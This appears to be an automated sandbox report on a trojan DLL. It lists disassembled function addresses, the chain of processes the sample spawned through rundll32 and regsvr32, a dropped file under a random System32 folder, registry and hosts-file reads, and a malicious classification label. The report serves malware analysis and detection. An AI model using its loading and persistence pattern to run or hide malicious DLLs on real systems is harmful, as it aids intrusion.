Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008846BD	0_2_008846BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00870EBC	0_2_00870EBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00870ABA	0_2_00870ABA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086C6B8	0_2_0086C6B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008680C0	0_2_008680C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087CAD5	0_2_0087CAD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087D8DB	0_2_0087D8DB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087CCD9	0_2_0087CCD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00883EE9	0_2_00883EE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087E4E5	0_2_0087E4E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008800EF	0_2_008800EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086F0E9	0_2_0086F0E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087BEFD	0_2_0087BEFD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00882009	0_2_00882009
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00878806	0_2_00878806
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00879A01	0_2_00879A01
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00877A0F	0_2_00877A0F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086B820	0_2_0086B820
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00868636	0_2_00868636
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00863431	0_2_00863431
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086A445	0_2_0086A445
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00874244	0_2_00874244
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00867442	0_2_00867442
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086E640	0_2_0086E640
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087F840	0_2_0087F840
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087B257	0_2_0087B257
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00872E5D	0_2_00872E5D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00874A66	0_2_00874A66
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00883263	0_2_00883263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00880A64	0_2_00880A64
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086DE74	0_2_0086DE74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087A474	0_2_0087A474
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087DC71	0_2_0087DC71
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086A871	0_2_0086A871
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087567B	0_2_0087567B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00867078	0_2_00867078
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00867E79	0_2_00867E79
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00876187	0_2_00876187
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00870F86	0_2_00870F86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00873D85	0_2_00873D85
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086FB8E	0_2_0086FB8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086238C	0_2_0086238C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00862194	0_2_00862194
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008807AA	0_2_008807AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008677A3	0_2_008677A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00878FAE	0_2_00878FAE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008817BD	0_2_008817BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086BFBE	0_2_0086BFBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087D1BC	0_2_0087D1BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008657B8	0_2_008657B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087C5D5	0_2_0087C5D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086E7DE	0_2_0086E7DE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087FBDE	0_2_0087FBDE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086C5D8	0_2_0086C5D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008767E6	0_2_008767E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00879DF5	0_2_00879DF5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008707F4	0_2_008707F4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008785FF	0_2_008785FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008655FF	0_2_008655FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00864BFC	0_2_00864BFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008727F9	0_2_008727F9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087E1F8	0_2_0087E1F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00882B09	0_2_00882B09
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086EF0C	0_2_0086EF0C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086670B	0_2_0086670B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087AD08	0_2_0087AD08
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00875515	0_2_00875515
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00875333	0_2_00875333
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00878D3D	0_2_00878D3D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00861F38	0_2_00861F38
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00872142	0_2_00872142
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086D14C	0_2_0086D14C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087654A	0_2_0087654A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087E955	0_2_0087E955
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00882D53	0_2_00882D53
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00877D5B	0_2_00877D5B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087FF58	0_2_0087FF58
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086F369	0_2_0086F369
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00874F74	0_2_00874F74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00879774	0_2_00879774
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00866B7A	0_2_00866B7A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087017B	0_2_0087017B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087437A	0_2_0087437A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00875779	0_2_00875779
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100291F6	2_2_100291F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002F378	2_2_1002F378
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100403D7	2_2_100403D7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1004250B	2_2_1004250B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10041557	2_2_10041557
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100395A1	2_2_100395A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002F784	2_2_1002F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1004091B	2_2_1004091B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002EACF	2_2_1002EACF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002FBA4	2_2_1002FBA4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10035D96	2_2_10035D96
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10040E5F	2_2_10040E5F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002EFA4	2_2_1002EFA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100291F6	3_2_100291F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002F378	3_2_1002F378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100403D7	3_2_100403D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1004250B	3_2_1004250B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10041557	3_2_10041557
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100395A1	3_2_100395A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002F784	3_2_1002F784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1004091B	3_2_1004091B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002EACF	3_2_1002EACF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002FBA4	3_2_1002FBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04444A66	4_2_04444A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443DE74	4_2_0443DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04447A0F	4_2_04447A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04452009	4_2_04452009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04438636	4_2_04438636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04442142	4_2_04442142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444654A	4_2_0444654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444FF58	4_2_0444FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443670B	4_2_0443670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444AD08	4_2_0444AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444EFDD	4_2_0444EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443C5D8	4_2_0443C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04444244	4_2_04444244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04437442	4_2_04437442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443E640	4_2_0443E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444F840	4_2_0444F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443A445	4_2_0443A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444B257	4_2_0444B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04442E5D	4_2_04442E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04450A64	4_2_04450A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04453263	4_2_04453263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444A474	4_2_0444A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443A871	4_2_0443A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444DC71	4_2_0444DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04437E79	4_2_04437E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04437078	4_2_04437078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444567B	4_2_0444567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04448806	4_2_04448806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04449A01	4_2_04449A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443B820	4_2_0443B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04433431	4_2_04433431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044380C0	4_2_044380C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444CAD5	4_2_0444CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444CCD9	4_2_0444CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444D8DB	4_2_0444D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444E4E5	4_2_0444E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443F0E9	4_2_0443F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044500EF	4_2_044500EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04453EE9	4_2_04453EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444BEFD	4_2_0444BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444A2A5	4_2_0444A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04431CA1	4_2_04431CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443BAA9	4_2_0443BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04443EAA	4_2_04443EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044536AA	4_2_044536AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044546BD	4_2_044546BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04440EBC	4_2_04440EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443C6B8	4_2_0443C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04440ABA	4_2_04440ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443D14C	4_2_0443D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444E955	4_2_0444E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04452D53	4_2_04452D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04447D5B	4_2_04447D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443F369	4_2_0443F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04444F74	4_2_04444F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04449774	4_2_04449774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04436B7A	4_2_04436B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04445779	4_2_04445779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444437A	4_2_0444437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444017B	4_2_0444017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04452B09	4_2_04452B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443EF0C	4_2_0443EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04445515	4_2_04445515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04445333	4_2_04445333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04448D3D	4_2_04448D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04431F38	4_2_04431F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444C5D5	4_2_0444C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444FBDE	4_2_0444FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443E7DE	4_2_0443E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044467E6	4_2_044467E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044407F4	4_2_044407F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04449DF5	4_2_04449DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044485FF	4_2_044485FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444E1F8	4_2_0444E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044355FF	4_2_044355FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044427F9	4_2_044427F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04434BFC	4_2_04434BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04443D85	4_2_04443D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04440F86	4_2_04440F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04446187	4_2_04446187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443FB8E	4_2_0443FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443238C	4_2_0443238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04432194	4_2_04432194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044377A3	4_2_044377A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04448FAE	4_2_04448FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044507AA	4_2_044507AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0444D1BC	4_2_0444D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044517BD	4_2_044517BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_044357B8	4_2_044357B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0443BFBE	4_2_0443BFBE

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10030E38 appears 58 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10030535 appears 87 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030E38 appears 49 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030535 appears 72 times

Source: hPJnda9rBy.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: hPJnda9rBy.dll

Virustotal: Detection: 18%

Source: hPJnda9rBy.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\hPJnda9rBy.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hPJnda9rBy.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6532 -ip 6532
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb",kzlZNp
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 536
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Knpnqswfpazuozi\koewoajrwakr.ckb",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\hPJnda9rBy.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hPJnda9rBy.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb",kzlZNp	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6532 -ip 6532	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 536	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Knpnqswfpazuozi\koewoajrwakr.ckb",DllRegisterServer	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF831.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winDLL@26/10@0/27

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:4180:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6532

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10021183 LoadResource,LockResource,SizeofResource,

2_2_10021183

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb(a source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.700670403.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000002.702229591.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.684427719.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.700685466.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.689014142.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.684358827.0000000000E03000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.684475829.0000000000E09000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbxa source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.689189866.0000000004745000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbTa source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.689189866.0000000004745000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdbfa source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
